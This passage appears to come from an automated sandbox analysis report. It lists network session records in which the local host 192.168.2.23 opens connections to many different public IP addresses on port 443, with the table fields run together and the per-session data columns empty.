                                                24824192.168.2.235250464.83.229.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24825192.168.2.2339952179.203.55.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24826192.168.2.2332844130.40.175.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24827192.168.2.234773291.134.41.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24828192.168.2.2340864160.156.145.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24829192.168.2.2352618203.242.53.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24830192.168.2.2354398116.43.238.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24831192.168.2.2346178147.235.31.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24832192.168.2.2357850135.21.15.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24833192.168.2.2351518177.182.203.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24834192.168.2.233715817.118.70.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24835192.168.2.234354694.124.18.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24836192.168.2.233929498.200.146.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24837192.168.2.2351674198.186.137.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24838192.168.2.2339430189.44.122.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24839192.168.2.235737251.107.51.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24840192.168.2.233894281.191.48.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24841192.168.2.2339870138.89.2.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24842192.168.2.234270262.155.30.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24843192.168.2.2348374179.79.181.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24844192.168.2.2334112115.38.65.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24845192.168.2.234820827.32.87.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24846192.168.2.2341388149.138.249.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24847192.168.2.2356472114.80.106.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24848192.168.2.235079435.253.41.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24849192.168.2.2335798187.62.219.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24850192.168.2.2348192114.22.81.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24851192.168.2.2360114159.112.125.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24852192.168.2.234854039.87.146.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24853192.168.2.234536879.149.32.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24854192.168.2.2356784216.198.168.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24855192.168.2.2349806149.55.176.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24856192.168.2.2341450102.112.53.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24857192.168.2.2350438112.123.173.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24858192.168.2.235270814.80.53.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24859192.168.2.2342744179.191.74.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24860192.168.2.2347070116.237.55.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24861192.168.2.233741654.89.175.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24862192.168.2.2357504113.193.113.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24863192.168.2.2348570200.196.2.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24864192.168.2.2345636164.61.131.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24865192.168.2.234367280.62.183.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24866192.168.2.235605014.206.242.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24867192.168.2.2351736171.76.128.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24868192.168.2.2339052156.11.170.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24869192.168.2.234005631.0.89.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24870192.168.2.2354616203.187.161.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24871192.168.2.2354650141.73.70.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24872192.168.2.2338960191.134.179.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24873192.168.2.235313292.61.203.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24874192.168.2.2352564116.74.167.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24875192.168.2.233486240.192.73.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24876192.168.2.2357706202.250.68.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24877192.168.2.235648647.82.96.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24878192.168.2.2360954164.221.12.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24879192.168.2.235701885.86.61.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24880192.168.2.234026023.162.126.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24881192.168.2.2335818106.25.30.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24882192.168.2.2334774197.14.83.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24883192.168.2.2355596184.161.28.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24884192.168.2.233445217.132.197.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24885192.168.2.234422687.204.46.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24886192.168.2.2345098148.237.165.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24887192.168.2.235592076.211.204.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24888192.168.2.233688284.169.238.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24889192.168.2.234904432.120.218.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24890192.168.2.234014268.107.189.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24891192.168.2.2342468223.226.45.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24892192.168.2.234786462.4.196.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24893192.168.2.2354046134.236.130.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24894192.168.2.2351326147.251.134.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24895192.168.2.234430485.74.53.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24896192.168.2.2358846162.247.249.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24897192.168.2.233371491.211.29.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24898192.168.2.2357178141.251.66.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24899192.168.2.2352250178.63.217.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24900192.168.2.235498082.131.54.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24901192.168.2.2339694103.239.186.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24902192.168.2.2337270126.21.66.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24903192.168.2.235282672.163.123.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24904192.168.2.234603859.59.108.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24905192.168.2.233701836.230.49.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24906192.168.2.2360766166.126.206.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24907192.168.2.2352368198.169.84.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24908192.168.2.2335000210.25.144.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24909192.168.2.2356844154.224.226.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24910192.168.2.2359544146.79.82.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24911192.168.2.235109268.14.42.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24912192.168.2.233703212.132.174.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24913192.168.2.2345524112.114.202.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24914192.168.2.2343230204.24.71.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24915192.168.2.233835023.214.210.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24916192.168.2.235465078.205.251.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24917192.168.2.23459629.172.178.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24918192.168.2.2358130144.44.106.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24919192.168.2.2352364173.204.188.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24920192.168.2.234930424.42.87.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24921192.168.2.2333606183.26.21.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24922192.168.2.233818888.166.157.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24923192.168.2.2334266210.153.242.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24924192.168.2.2343432203.213.127.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24925192.168.2.2351788132.191.66.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24926192.168.2.2343870129.224.40.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24927192.168.2.233972694.97.134.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24928192.168.2.234161686.99.218.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24929192.168.2.2353974179.171.17.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24930192.168.2.235554693.181.76.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24931192.168.2.234197251.250.132.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24932192.168.2.2349842114.175.57.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24933192.168.2.233952463.118.108.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24934192.168.2.234972048.6.44.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24935192.168.2.2336378164.32.154.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24936192.168.2.2343560209.219.250.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24937192.168.2.2343008149.80.26.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24938192.168.2.2342154193.3.66.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24939192.168.2.234805690.85.10.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24940192.168.2.233418282.160.141.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24941192.168.2.233841014.108.26.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24942192.168.2.2355006153.176.32.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24943192.168.2.2341212213.136.215.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24944192.168.2.2353118193.144.177.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24945192.168.2.2340558208.4.31.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24946192.168.2.23506942.122.160.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24947192.168.2.2354098124.18.117.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24948192.168.2.2335566106.143.254.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24949192.168.2.2347780192.196.182.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24950192.168.2.2337194179.242.13.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24951192.168.2.2344016180.79.106.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24952192.168.2.2354858197.200.54.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24953192.168.2.2335440189.87.89.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24954192.168.2.2346538111.40.255.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24955192.168.2.2355342148.177.36.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24956192.168.2.2351196124.162.24.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24957192.168.2.234570435.251.144.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24958192.168.2.233517660.141.96.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24959192.168.2.2346190189.142.244.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24960192.168.2.2341862216.84.139.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24961192.168.2.234185487.88.229.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24962192.168.2.2351380128.79.189.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24963192.168.2.2338334161.204.107.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24964192.168.2.23365041.184.16.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24965192.168.2.2359452210.23.188.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24966192.168.2.235883281.200.137.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24967192.168.2.2358576109.142.153.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24968192.168.2.2334140149.137.180.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24969192.168.2.2353364181.14.232.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24970192.168.2.2357350171.36.193.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24971192.168.2.233570899.185.48.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24972192.168.2.2350994179.233.34.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24973192.168.2.2350242145.162.115.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24974192.168.2.2360704222.29.149.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24975192.168.2.2337504193.143.214.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24976192.168.2.2345456117.153.77.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24977192.168.2.2341106157.234.129.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24978192.168.2.2340546168.242.58.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24979192.168.2.2356864200.67.248.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24980192.168.2.235117827.6.222.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24981192.168.2.2359188195.107.135.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24982192.168.2.235407243.93.33.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24983192.168.2.233731284.192.126.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24984192.168.2.23557848.206.240.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24985192.168.2.235766854.8.190.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24986192.168.2.2343548217.208.86.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24987192.168.2.234497292.70.46.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24988192.168.2.2360998167.42.221.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24989192.168.2.234085818.20.58.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24990192.168.2.2346640121.115.150.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24991192.168.2.234777893.91.218.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24992192.168.2.2337522174.153.186.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24993192.168.2.234662074.45.153.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24994192.168.2.2354202162.181.38.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24995192.168.2.235659290.120.8.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24996192.168.2.2332950151.50.255.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24997192.168.2.235432284.159.123.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24998192.168.2.2335348172.44.171.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24999192.168.2.2346208191.194.211.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25000192.168.2.2335926172.167.255.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25001192.168.2.2341138190.33.146.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25002192.168.2.233733223.132.155.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25003192.168.2.233672436.191.250.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25004192.168.2.233394272.16.159.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25005192.168.2.235598827.243.33.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25006192.168.2.2350870120.75.191.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25007192.168.2.234990289.118.17.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25008192.168.2.2354422157.245.80.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25009192.168.2.2332832179.35.126.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25010192.168.2.235066077.183.21.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25011192.168.2.234460081.160.162.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25012192.168.2.2358960194.119.129.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25013192.168.2.2333504159.232.82.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25014192.168.2.2337124185.37.118.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25015192.168.2.2352252202.186.10.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25016192.168.2.2350418162.169.93.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25017192.168.2.2347514101.148.204.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25018192.168.2.235957240.119.153.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25019192.168.2.2344962152.39.135.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25020192.168.2.235294824.206.204.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25021192.168.2.2354682216.25.104.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25022192.168.2.23518089.240.140.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25023192.168.2.2360350223.13.187.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25024192.168.2.2348216198.178.30.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25025192.168.2.2356424193.37.81.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25026192.168.2.2358954207.87.245.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25027192.168.2.2348844126.236.59.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25028192.168.2.2337482143.17.161.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25029192.168.2.234364844.107.32.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25030192.168.2.2333144168.222.2.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25031192.168.2.2357368130.47.58.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25032192.168.2.23332182.235.109.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25033192.168.2.2350122100.42.193.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25034192.168.2.235081458.42.96.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25035192.168.2.2341536212.212.181.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25036192.168.2.234469261.79.145.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25037192.168.2.2334470133.134.89.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25038192.168.2.235909652.78.227.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25039192.168.2.235531884.94.76.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25040192.168.2.235381073.49.46.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25041192.168.2.2358864167.108.23.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25042192.168.2.2349814197.1.71.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25043192.168.2.233370054.11.156.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25044192.168.2.2360066196.129.86.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25045192.168.2.2360608223.214.98.36443
                                                TimestampBytes transferredDirectionData


